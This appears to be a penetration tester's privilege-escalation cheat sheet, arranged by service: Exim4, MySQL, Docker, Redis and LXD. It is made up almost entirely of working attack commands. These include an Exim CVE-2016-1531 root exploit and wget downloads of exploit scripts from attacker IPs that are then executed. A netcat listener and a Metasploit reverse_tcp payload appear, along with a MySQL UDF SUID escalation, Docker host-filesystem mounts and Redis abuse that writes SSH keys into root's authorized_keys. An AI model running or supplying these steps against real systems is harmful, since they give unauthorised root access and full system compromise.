Services

Table of Content

Exim4

# https://www.exploit-db.com/exploits/39535

#!/bin/sh
echo [ CVE-2016-1531 local root exploit
cat > /tmp/root.pm << EOF
package root;
use strict;
use warnings;
system("/bin/sh");
EOF
PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps
wget http://192.168.0.8:8000/raptor_exim_wiz.sh
chmod 777 raptor_exim_wiz.sh
./raptor_exim_wiz.sh -m netcat

nc -lvvp 4444

MySQL

# If MySQL is running as root, you can run commands
sys_exec('usermod -a -G admin username')
Select sys_exec('whoami');
select sys_exec('/bin/bash');
Select sys_eval('whoami');


# MySQL run as root and version is <5 go for User Defined Functions (UDF)
https://www.exploit-db.com/exploits/1518/

# searching and compiling exploit
searchsploit –m 1518.c
gcc -g -shared -Wl,-soname,1518.so -o 1518.so 1518.c -lc
wget http://192.168.1.109/1518.so
chmod 777 1518.so

mysql –u root –p
use mysql;

# Exploitation
create table foo(line blob);
insert into foo values(load_file('/tmp/1518.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
create function do_system returns integer soname '1518.so';
select do_system('chmod u+s /usr/bin/find');

# Privesc
touch raj
find raj –exec "whoami" \;
find raj –exec "/bin/sh" \;

Docker

# If the user can run docker
docker run –v /root:/hack -t debian:jessie /bin/sh -c 'ls -al /hack'

# Docker privesc on metasploit
msf > use exploit/linux/local/docker_daemon_privilege_escalation
msf exploit(linux/local/docker_daemon_privilege_escalation) >  set lhost 192.168.1.116
msf exploit(linux/local/docker_daemon_privilege_escalation) >  set payload linux/x86/meterpreter/reverse_tcp
msf exploit(linux/local/docker_daemon_privilege_escalation) >  set session 1
msf exploit(linux/local/docker_daemon_privilege_escalation) >  run
# Check available images
docker images

# You can mount the / of the host inside a container
docker run -v /:/root -i -t ubuntu /bin/bash

Redis

# You can abuse Redis by writing malicious RSA keypair to the disk
ssh-keygen

# Prepare the public key by adding newlines with the help of the following command
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > public.txt

# Load the malicious public key into redis
cat public.txt | redis-cli -h 127.0.0.1 -a 8a7b86a2cd89d96dfcc125ebcc0535e6 -x set pub

# Set path to dump the content with the help of the following command
redis-cli -h 127.0.0.1 -a 8a7b86a2cd89d96dfcc125ebcc0535e6 config set dir "/root/.ssh/"

# Configure the dbfilename as authorized_keys
redis-cli -h 127.0.0.1 -a 8a7b86a2cd89d96dfcc125ebcc0535e6 config set dbfilename authorized_keys

# Save the configuration and exit.
redis-cli -h 127.0.0.1 -a 8a7b86a2cd89d96dfcc125ebcc0535e6 save

# Then authenticate
cd .ssh
ssh root@127.0.0.1

LXD

# Searching LXD exploit and get exploit (attacker machine)	
searchsploit lxd
searchsploit -m 46978
wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine
bash build-alpine

# Victim machine
wget http://192.168.0.26:8000/alpine-v3.10-x86_64-20190905_0123.tar.gz
nano raj.sh # (cp the exploit content)
chmod 777 raj.sh
./raj.sh -f alpine-v3.10-x86_64-20190905_0123.tar.gz

# Crawl the host filesystem
cd /mnt/root/